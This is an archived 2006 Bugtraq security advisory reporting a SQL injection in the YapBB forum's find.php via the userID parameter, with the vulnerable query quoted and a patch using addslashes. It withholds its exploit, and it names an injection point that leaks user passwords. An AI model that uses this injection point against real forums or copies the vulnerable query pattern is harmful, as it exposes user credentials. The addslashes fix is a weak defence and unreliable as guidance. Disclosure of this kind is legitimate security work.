lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060515201934.17169.qmail@securityfocus.com>
Date: 15 May 2006 20:19:34 -0000
From: geinblues@...il.com
To: bugtraq@...urityfocus.com
Subject: YapBB <= 1.2 Beta2 'find.php' SQL Injection Vulnerability



Title : YapBB <= 1.2 Beta2 'find.php' SQL Injection Vulnerability

------------------------------------------
Author : x90c(Kyong Joo, Jung)
Published : 2006.5.16
E-mail : geinblues [at] gmail.com
Site : http://www.chollian.net/~jyj9782
------------------------------------------

0x01 Summary

 YapBB is a OpenSource Web Forum written in php.
 (http://sourceforge.net/projects/yapbb)

 This web program is vulnerable to sql injection attack. 
 So malicious attacker can get Every nicknames(id), passwords for this YapBB.

 Let's see the codes ~!


0x02 Testbed

	- Fedora Core 2
	- MySQL-Server 5.0.19-log
	- Php5 ( magic_quotes_gpc = On )


0x03 Codes

~/YapBB-1.2-Beta2/YapBB/find.php:
-
..
34: $userBool = $HTTP_POST_VARS["choice"]=="user";  // if choice == 'user'
36: $userpostBool = !empty($HTTP_GET_VARS["userID"]); // userID == '[inject sql]'
..
119: else if ($userpostBool)
120: {
128:	$postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " . 
        $cfgDatabase['post'] . " AS p, " . $cfgDatabase['topic'] . " AS t, " . 
	$cfgDatabase['user'] . " AS u WHERE t.id = p.topicid AND p.posterid = $userID AND 
	u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50");   // execute sql!
-

	No words.


I wrote a exploit for getting all YapBB user's nicknames and passwords.
Sorry i can't put exploit in this advisory =)


0x04 Exploit

[x90c@...kzen testbed]$ whoami
x90c
[x90c@...kzen testbed]$


0x05 Patch

~/YapBB-1.2-Beta2/YapBB/find.php:
..
128: $postRes = $postQuery->select("SELECT p.date, t.id, t.description, u.nickname FROM " . 
     $cfgDatabase['post'] . " AS p, " . $cfgDatabase['topic'] . " AS t, " . $cfgDatabase['user'] . 
     " AS u WHERE t.id = p.topicid AND p.posterid = '" . addslashes($userID) . 
     "' AND u.id = p.posterid GROUP BY p.topicid ORDER BY p.date DESC LIMIT 50");       // x90c patch!
..




Thanks!


- Blu3h4t Team in korea








Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ